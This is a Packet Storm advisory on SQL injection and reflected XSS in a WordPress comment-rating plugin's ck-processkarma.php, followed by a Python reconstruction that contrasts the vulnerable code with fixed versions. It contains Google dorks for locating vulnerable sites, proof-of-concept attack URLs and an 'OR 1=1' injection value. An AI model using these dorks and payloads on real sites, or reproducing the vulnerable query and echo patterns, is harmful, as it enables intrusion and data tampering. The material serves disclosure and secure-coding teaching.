WordPress Comment Rating Cross Site Scripting / SQL Injection

2012-01-03T00:00:00
ID PACKETSTORM:108314
Type packetstorm
Reporter The Evil Thinker
Modified 2012-01-03T00:00:00

Description

                                        
                                            `# Exploit Title: Wordpress comment rating plugin multiple Vulnerabilities  
# Google Dork: 1- inurl:"/wp-content/plugins/comment-rating/"  
# 2- inurl:"/ck-processkarma.php?id="  
# Date: 2/1/2012  
# Author: The Evil Thinker  
# Contact : Enstene156@hotmail.fr  
# Software Link: www.wordpress.com  
# Vulnerable plugin: Comment rating plugin  
# Tested on: Linux  
  
Details :  
---------  
  
The vulnerable file is "ck-processkarma.php".  
The script does not validate or escape its request parameters before use: "id" is placed into an SQL query (SQL injection) and "path" is reflected into the response (cross-site scripting).  
  
PoC 1 (XSS) :  
  
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]&action=add&path=<script>alert('Founded by TheEvilThinker')</script>&imgIndex=  
  
  
PoC 2 (SQL injection) :  
  
http://www.TheMilkeyWay.exe/wp-content/plugins/comment-rating/ck-processkarma.php?id=[Integer Value]*****Inject_me_From_Here*****&action=add&path=TheMilkeyWay.exe/wp-content/plugins/comment-rating/&imgIndex=  
  
-------------------------------------------------------------------------------------------  
  
Special Greetz : Zack (DBA-HACKER) , Siper-N , Root-Mar , Anash , H!ch4m , Dr.Unknown , Mario-Gomez , BiiF0 , and everyone else, without making the list any longer  
  
  
  
`
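As an added example, not part of the advisory and not the plugin's own code: the two bug classes reported above, reconstructed in Python over an in-memory SQLite table so they can be run offline. The table name `ck_karma`, its columns, the `<img>` markup and the `PLUGIN_URL` base are assumptions. The vulnerable functions interpolate the `id` and `path` parameters the way the advisory describes; each sits beside a fix (integer validation plus a bound parameter, the equivalent of `$wpdb->prepare('%d', ...)`, and a server-side asset base instead of a client-supplied `path`).

```python
import sqlite3

# Constructed sample table standing in for the plugin's karma storage
# (table and column names are assumptions, not the plugin's schema).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE ck_karma (id INTEGER PRIMARY KEY, karma INTEGER)")
    con.executemany("INSERT INTO ck_karma VALUES (?, ?)", [(1, 0), (2, 0), (3, 0)])
    con.commit()
    return con


def karma_of(con):
    """Current karma per row, as {id: karma}."""
    return dict(con.execute("SELECT id, karma FROM ck_karma ORDER BY id"))


# --- the "id" parameter: SQL injection -------------------------------------

def add_karma_vulnerable(con, id_param):
    """Request parameter concatenated straight into the UPDATE (the bug class).
    Returns the number of rows changed: 3 for an id of "1 OR 1=1"."""
    sql = f"UPDATE ck_karma SET karma = karma + 1 WHERE id = {id_param}"
    cur = con.execute(sql)
    con.commit()
    return cur.rowcount


def add_karma_fixed(con, id_param):
    """Validate as an integer, then bind it as a query parameter."""
    try:
        comment_id = int(id_param)
    except (TypeError, ValueError):
        return 0  # reject non-numeric ids instead of running any query
    cur = con.execute(
        "UPDATE ck_karma SET karma = karma + 1 WHERE id = ?", (comment_id,)
    )
    con.commit()
    return cur.rowcount


# --- the "path" parameter: reflected XSS -----------------------------------

def render_vulnerable(path, img_index):
    """Client-supplied path echoed unescaped into the response markup."""
    return f'<img src="{path}img/karma{img_index}.gif">'


# Assumed server-side location of the plugin's images; in WordPress this
# would come from plugin_dir_url(), never from the request.
PLUGIN_URL = "https://example.invalid/wp-content/plugins/comment-rating/"


def render_fixed(img_index):
    """Take the asset location from server-side config and coerce the only
    echoed request value to an integer, so no markup can be injected."""
    try:
        idx = int(img_index)
    except (TypeError, ValueError):
        idx = 0
    return f'<img src="{PLUGIN_URL}img/karma{idx}.gif">'


if __name__ == "__main__":
    con = make_db()
    print("vulnerable, id='1 OR 1=1':", add_karma_vulnerable(con, "1 OR 1=1"), "rows updated")
    con = make_db()
    print("fixed,      id='1 OR 1=1':", add_karma_fixed(con, "1 OR 1=1"), "rows updated")
    print(render_vulnerable("<script>alert(1)</script>", ""))
    print(render_fixed("<script>alert(1)</script>"))
```

The SQLite `execute()` call runs a single statement, so stacked queries are not the issue here; the `OR 1=1` tautology alone turns a one-row update into a table-wide one. If a request value genuinely must be echoed into an attribute, HTML-escape it for that context and constrain it to the shape you expect (here, an integer index); a URL taken from the client should not be reflected at all.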